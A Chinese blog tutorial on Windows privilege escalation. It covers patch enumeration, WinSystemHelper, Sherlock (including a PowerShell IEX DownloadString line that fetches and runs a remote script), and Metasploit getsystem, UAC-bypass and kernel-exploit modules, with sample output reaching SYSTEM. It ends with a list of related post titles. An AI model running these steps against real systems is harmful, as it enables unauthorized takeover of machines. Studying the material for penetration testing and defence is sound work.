Windows提权流程及手法
Windows提权
- 一、信息收集
- 二、WinSystemHelper
- 三、Sherlock
- 四、MSF提权
- 五、参考链接
一、信息收集
收集本机systeminfo中补丁信息
在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp
查询exp,选择对应的Exp下载运行
https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits
提权Exp的运行方式,一般有以下几种:
1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
2、在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
3、利用MSF等工具
4、C++源码,Python脚本,PowerShell脚本等特殊方式
二、WinSystemHelper
使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测
https://github.com/brianwrf/WinSystemHelper
图片
上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果
然后在可利用的Exp中任意下载一个并执行即可
三、Sherlock
Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可
https://github.com/rasta-mouse/Sherlock
图片
启动Powershell
$ powershell.exe -exec bypass
本地加载脚本
$ Import-Module Sherlock.ps1
远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)
检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns
四、MSF提权
Getsystem
meterpreter> getsystemBypassUACuse exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background # 后台session
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>
后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run
内核提权
查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
查询Exp
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run
利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
五、参考链接
https://github.com/SecWiki/windows-kernel-exploitshttps://github.com/brianwrf/WinSystemHelperhttps://github.com/rasta-mouse/Sherlock
Windows提权流程及手法相关推荐
- windows提权速查流程
windows提权速查流程 1.可利用漏洞信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询e ...
- Windows提权基本原理,各位表哥了解下!
Windows提权基本原理 没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell. 在演示环境,你经 ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
目录 权限分类 针对环境 webshell权限 本地用户权限 提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...
- 高收益的笨办法:暴破在Windows提权中的应用
千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路,也是后渗透阶段成功的关键.windows 提权,我常 ...
- windows 提权 cve-2018-8897
windows 提权 cve-2018-8897 影响范围:基本上是全版本 具体影响范围看详情:https://portal.msrc.microsoft.co - isory/CVE-2018-88 ...
- Windows提权基础:信息收集技巧及可用漏洞搜索
本文收集整理一些跟提权紧密相关的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本. 0X00 Windows提权信息收 ...
- 使用MSF进行提权(windows提权、linux提权、wesng使用)
文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
- 张小白的渗透之路(十一)--windows提权详解
windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** ...
最新文章
- NSException异常处理
- 线上分享 | 浅谈用户生命周期运营
- mvc的Controller返回值类型ActionResult详解
- Android Gallery控件使用方法详解
- 7.9模拟赛T1图的遍历(dfs)
- MFC之添加PNG,JPG图片
- javascript原型继承圣杯模式
- Linux数据链路层的包解析
- python图像标记工具怎么用_图像标注教程(使用LabelImg标注工具)
- 开普勒行星运动三定律
- python aic准则_赤池信息准则AIC,BIC
- 青年教师计算机培训美篇,小学生停课不停学美篇 小学生停课不停学美篇开头语...
- selenium模拟刷百度流量源码
- 解决docker nacos exited(137)
- 3-8 B: 分离LZY的字符串
- 计算机二级考试用户名怎么查,计算机二级考试成绩查询方法与具体步骤
- 基于GoLang的MMO游戏服务器(四)
- ADC和DAC的DNL和INL
- 01.基于Irises的springboot项目框架(简版)
- 02-网络为什么要分层